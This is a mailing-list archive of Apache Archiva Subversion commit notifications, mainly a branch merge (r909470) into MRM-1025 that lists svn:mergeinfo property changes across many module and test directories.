/archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration/TestConfiguration.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration/TestConfiguration.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration/TestConfiguration.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration/TestConfiguration.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration/TestConfiguration.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration/TestConfiguration.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree:825850-885005,885006-909464* From [email protected] Fri Feb 12 15:54:27 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90591 invoked from network); 12 Feb 2010 15:54:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 15:54:27 -0000 Received: (qmail 76063 invoked by uid 500); 12 Feb 2010 15:54:27 -0000 Delivered-To: [email protected] Received: (qmail 76005 invoked by uid 500); 12 Feb 2010 15:54:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 75996 invoked by uid 99); 12 Feb 2010 15:54:27 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 15:54:27 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 15:54:19 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id BCB8023888E8; Fri, 12 Feb 2010 15:53:56 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909470 [1/3] - in /archiva/branches/MRM-1025: ./ archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/ archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/arch... Date: Fri, 12 Feb 2010 15:53:54 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Fri Feb 12 15:53:49 2010 New Revision: 909470 URL: http://svn.apache.org/viewvc?rev=909470&view=rev Log: Merged /archiva/trunk:r909071-909464 Modified: archiva/branches/MRM-1025/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/Consumer.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler/ArchivaTaskScheduler.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler/database/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF/plexus/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler/database/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler/database/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutor.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArtifactIndexingTask.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/IndexingArchivaTaskScheduler.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus/components.xml (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutorTest.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutor.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryArchivaTaskScheduler.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTask.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTaskJob.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestConsumer.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestRepositoryStatisticsManager.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/archiva-test.xml (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.xml (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/test-repo/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.properties (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.xml (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration/TestConfiguration.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/TestMetadataRepository.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/TestMetadataResolver.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/security/UserRepositoriesStub.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags/DependencyTreeTest.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version/artifactId-version.pom (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0/child1-1.0.pom (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0/child2-1.0.pom (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0/child3-1.0.pom (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0/grandchild1-2.0.pom (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0/grandchild2-2.0.pom (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0/grandchild3-2.0.pom (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0/great-grandchild-3.0.pom (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags/DependencyTreeTest.xml (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java (props changed) archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/ (props changed) archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/AllFilter.java (props changed) archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/ExcludesFilter.java (props changed) archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/filter/Filter.java (props changed) archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/ (props changed) archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/RepositoryPathTranslator.java (props changed) archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/storage/StorageMetadataResolver.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditEventFactory.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/AuditManager.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/DefaultAuditManager.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/MetadataAuditListener.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/DummyLifecycleBindingsInjector.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryPathTranslator.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacet.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectFacetFactory.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenProjectParent.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadata.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReader.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/RepositoryModelResolver.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/configuration/TestConfiguration.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/TestMetadataResolver.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReaderTest.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index/some-index.zip (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/incomplete-metadata-1.0-20091101.112233-1.pom (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/maven-metadata.xml (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0/invalid-pom-1.0.pom (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/malformed-metadata-1.0-20091101.112233-1.pom (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/maven-metadata.xml (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0/mislocated-pom-1.0.pom (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT/missing-metadata-1.0-20091101.112233-1.pom (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/plugins/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader/maven-metadata.xml (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/commons-io/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.xml (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/ (props changed) 